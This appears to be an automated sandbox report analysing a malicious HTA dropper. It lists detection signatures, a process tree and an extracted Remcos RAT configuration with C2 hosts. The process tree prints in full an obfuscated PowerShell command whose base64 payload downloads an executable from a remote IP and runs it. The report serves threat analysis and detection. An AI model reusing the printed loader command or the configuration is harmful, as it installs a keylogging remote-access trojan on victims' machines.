Edit tour
Windows
Analysis Report
greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta
Overview
General Information
| Sample name: | greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta |
| Analysis ID: | 1577568 |
| MD5: | 5590c12b4f62de6de143d675d7681db0 |
| SHA1: | e7f0a97a22c0c11336e1cbc37fee2e31adbf01ee |
| SHA256: | 3057554d997baa307152ad177f47430aa1b8748f2021c8080cc6876016829b23 |
| Tags: | htauser-abuse_ch |
| Infos: |   |
 | |
Detection
Cobalt Strike, Remcos, DBatLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected obfuscated html page
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
PowerShell case anomaly found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample is not signed and drops a device driver
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Creation with Colorcpl
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Abnormal high CPU Usage
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 6936 cmdline: mshta.exe "C:\Users\ user\Deskt op\greatin diancompan iesgivenbe stgiftfory ourhealthg ivengoodre turns.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
cmd.exe (PID: 6356 cmdline: "C:\Window s\system32 \cmd.exe" "/C PoWERS HeLl.Exe -EX bypAs S -n oP - w 1 -c DEVIC eCreDEnTIa LDePLOYmEn T.EXe ; invoke-EXP resSIon($( InvoKe-Exp ressION('[ sYsTeM.TEX T.EnCOdiNG ]'+[CHaR]5 8+[cHAR]58 +'Utf8.geT STriNg([Sy sTEM.CONvE rt]'+[chAr ]0X3a+[chA R]58+'From BaSE64StRi nG('+[chAr ]0x22+'JFY wICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgID0gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgQURkLXR 5cEUgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL U1lTUJFcmR lZklOaVRJT 24gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgJ1t EbGxJbXBvc nQoIlVyTG1 vbiIsICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI ENoYXJTZXQ gPSBDaGFyU 2V0LlVuaWN vZGUpXXB1Y mxpYyBzdGF 0aWMgZXh0Z XJuIEludFB 0ciBVUkxEb 3dubG9hZFR vRmlsZShJb nRQdHIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gZ0ZYLHN0c mluZyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB 0c0FYcFFDS kpsLHN0cml uZyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBnY ndUS2dWdEV IZSx1aW50I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIE9NZHV KcUpRUWFCL EludFB0ciA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBnKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIC1uQW1 FICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICJ1Q UxUUUprTXl pIiAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtb kFNZVNwYUN FICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHhBV HFRICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 QYXNzVGhyd TsgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgJFY wOjpVUkxEb 3dubG9hZFR vRmlsZSgwL CJodHRwOi8 vMTczLjIxN C4xNjcuNzQ vNDQ0L25pY 2Vyb3NlLmV 4ZSIsIiRlb nY6QVBQREF UQVxuaWNlc m9zZS5leGU iLDAsMCk7c 1RhclQtU0x FRVAoMyk7S W5WT0tFLWV YcFJFU3NpT 24gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIiR FTlY6QVBQR EFUQVxuaWN lcm9zZS5le GUi'+[ChAR ]34+'))')) )" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6312 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 2488 cmdline: PoWERSHeLl .Exe -EX bypAsS -noP -w 1 -c DEVICeCr eDEnTIaLDe PLOYmEnT.E Xe ; inv oke-EXPres SIon($(Inv oKe-Expres sION('[sYs TeM.TEXT.E nCOdiNG]'+ [CHaR]58+[ cHAR]58+'U tf8.geTSTr iNg([SysTE M.CONvErt] '+[chAr]0X 3a+[chAR]5 8+'FromBaS E64StRinG( '+[chAr]0x 22+'JFYwIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgID0gICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg QURkLXR5cE UgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgLU1l TUJFcmRlZk lOaVRJT24g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgJ1tEbG xJbXBvcnQo IlVyTG1vbi IsICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIENo YXJTZXQgPS BDaGFyU2V0 LlVuaWNvZG UpXXB1Ymxp YyBzdGF0aW MgZXh0ZXJu IEludFB0ci BVUkxEb3du bG9hZFRvRm lsZShJbnRQ dHIgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgZ0 ZYLHN0cmlu ZyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICB0c0 FYcFFDSkps LHN0cmluZy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBnYndU S2dWdEVIZS x1aW50ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IE9NZHVKcU pRUWFCLElu dFB0ciAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BnKTsnICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IC1uQW1FIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICJ1QUxU UUprTXlpIi AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtbkFN ZVNwYUNFIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIHhBVHFR ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1QYX NzVGhydTsg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgJFYwOj pVUkxEb3du bG9hZFRvRm lsZSgwLCJo dHRwOi8vMT czLjIxNC4x NjcuNzQvND Q0L25pY2Vy b3NlLmV4ZS IsIiRlbnY6 QVBQREFUQV xuaWNlcm9z ZS5leGUiLD AsMCk7c1Rh clQtU0xFRV AoMyk7SW5W T0tFLWVYcF JFU3NpT24g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIiRFTl Y6QVBQREFU QVxuaWNlcm 9zZS5leGUi '+[ChAR]34 +'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
csc.exe (PID: 4900 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\mk3z1vxw \mk3z1vxw. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 2860 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SDF90.tmp" "c:\Users \user\AppD ata\Local\ Temp\mk3z1 vxw\CSCE89 B464233884 2338CD923B 6CF8B4F17. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) 
nicerose.exe (PID: 6500 cmdline: "C:\Users\ user\AppDa ta\Roaming \nicerose. exe" MD5: CCDCD04A0FFDE31366754018598EB02F) - cmd.exe (PID: 1276 cmdline:
C:\Windows \system32\ cmd.exe /c C:\Users\ Public\Lib raries\FX. cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
colorcpl.exe (PID: 5368 cmdline: C:\Windows \System32\ colorcpl.e xe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
- Emxwenem.PIF (PID: 6384 cmdline:
"C:\Users\ Public\Lib raries\Emx wenem.PIF" MD5: CCDCD04A0FFDE31366754018598EB02F) - cmd.exe (PID: 7104 cmdline:
C:\Windows \system32\ cmd.exe /c C:\Users\ Public\Lib raries\FX. cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1664 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - colorcpl.exe (PID: 4940 cmdline:
C:\Windows \System32\ colorcpl.e xe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
- Emxwenem.PIF (PID: 7164 cmdline:
"C:\Users\ Public\Lib raries\Emx wenem.PIF" MD5: CCDCD04A0FFDE31366754018598EB02F) - cmd.exe (PID: 708 cmdline:
C:\Windows \system32\ cmd.exe /c C:\Users\ Public\Lib raries\FX. cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6072 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - colorcpl.exe (PID: 3864 cmdline:
C:\Windows \System32\ colorcpl.e xe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| DBatLoader | This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. | No Attribution |
{"Download Url": ["https://www.maan2u.com/docs/233_Emxwenemixg"]}{"Host:Port:Password": ["185.174.103.111:2404:1", "185.174.103.111:2468:1", "apostlejob2.duckdns.org:2468:1", "apostlejob2.duckdns.org:2404:1"], "Assigned name": "Big Money 1", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-3W4HX7", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security | ||
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
| REMCOS_RAT_variants | unknown | unknown |
| |
| Click to see the 30 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
| REMCOS_RAT_variants | unknown | unknown |
| |
| INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows exceutables potentially bypassing UAC using eventvwr.exe | ditekSHen |
| |
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| Click to see the 24 entries | ||||
System Summary |   |
|---|
| Source: | Author: frack113, Nasreddine Bencherchali: | ||
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: frack113: | ||
| Source: | Author: Michael Haag: | ||